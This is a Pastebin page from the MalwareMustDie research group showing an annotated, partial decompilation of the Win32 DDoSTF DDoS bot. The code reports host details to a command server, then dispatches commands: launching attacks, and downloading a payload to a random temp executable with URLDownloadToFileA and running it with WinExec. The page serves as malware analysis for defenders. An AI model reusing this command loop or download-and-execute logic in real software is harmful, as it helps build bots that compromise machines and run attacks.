MalwareMustDie

Win32/DDOSTF Select WinOS-Cases

Apr 9th, 2016
3,892
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /* MalwareMustDie!!
  2.    DDoSTF win32 disassembled, by @unixfreaxjp
  3.    using experimental decompiler for r2  */
  4.  
  5. fn.0x40483B()
  6. {
  7.  result = fn.0x4027FD();
  8.   dword.9x40890C = result;
  9.   if ( result )
  10.   {
  11.     strcpy($Src, var11);
  12.     SleepTrick();
  13.     fn.0x402F9F(); // query HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0
  14.                    // for speed & processors
  15.     SleepTrick();
  16.     GetSystemInfo(&SystemInfo); // System information
  17.     SleepTrick();
  18.     SystemInfo.dwNumberOfProcessors; // CPU info
  19.     GetComputerNameA(&Buffer, &nSize);  // Hostname
  20.     GetSystemDefaultUILanguage(); // DefaultUILanguage
  21.     SleepTrick();
  22.     strcpy(&var31, "ver 7.0"); //
  23.     SleepTrick();
  24.     *(_DWORD *)buf = 11;
  25.     memcpy(&Dst, &Src, 0xA0);
  26.     SleepTrick();
  27.     if ( send(dword.0x40890C, buf, 520, 0) != -1 )
  28.     {
  29.       while ( 1 )
  30.       {
  31.         readfds.fd_array[0] = dword.0x40890C;
  32.         readfds.fd_count = 1;
  33.         var2 = select(dword.0x40890C + 1, &readfds, 0, 0, 0);
  34.         if ( var2 == -1 )
  35.           break;
  36.         if ( var2 && _WSAFDIsSet(dword.0x40890C, &readfds) )
  37.         {
  38.           var3 = recv(dword.0x40890C, &var12, 388, 0);
  39.           if ( !v3 || var3 == -1 )
  40.           {
  41.             closesocket(dword.0x40890C);
  42.             break;
  43.           }
  44.           memcpy(&var14, &var12, 0x208);
  45.           switch (var15)
  46.           {
  47.             case 5:
  48.               memcpy(&Params, &var16, 0x184);
  49.               fn.0x403F05(&Params); // go to 12 attack cascade switch ala BillGates
  50.               break;
  51.             case 6:
  52.               dword.0x408938 = 0;
  53.               break;
  54.             case 7:
  55.               CmdLine = 0; Source = 0;
  56.               memset(&var19, 0, 0x100);
  57.               var20 = 0; var21 = 0;
  58.               memset(&var23, 0, 0x7C);
  59.               var24 = 0; var25 = 0;
  60.               GetTempPathA(0x104, &CmdLine);
  61.               var4 = fn.0x4022DB(26) + 97;// target assembles here
  62.               var5 = fn.0x4022DB(26) + 97;// target assembles here
  63.               var6 = fn.0x4022DB(26) + 97;// target assembles here
  64.               var7 = fn.0x4022DB(26) + 97;// target assembles here
  65.               var8 = fn.0x4022DB(26);
  66.               wsprintfA(&Source, "\\%c%c%c%c%c.exe", [var8 + 97], var7, var6, var5, var4);
  67.               strcat(&CmdLine, &Source);
  68.               var9 = LoadLibraryA("urlmon.dll");
  69.               var10 = GetProcAddress(v9, "URLDownloadToFileA"); // download payload..
  70.               ((void (__stdcall *)(_DWORD, char *, char *, signed int, _DWORD))v10)(0, &var16, &CmdLine, 10, 0);
  71.               WinExec(&CmdLine, 0); // execute the payload..
  72.               break;
  73.             case 8:
  74.               dword.0x40893C = 0;
  75.               CreateThread(0, 0, fn.0x404659, 0, 0, 0); // threaded process start
  76.               break;
  77.             case 9:
  78.               dword.0x40893C = 1;
  79.               break;
  80.           }
  81.         }
  82.       }
  83.     }
  84.     result = closesocket(dword.0x40890C);
  85.   }
  86.   return result;
  87. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×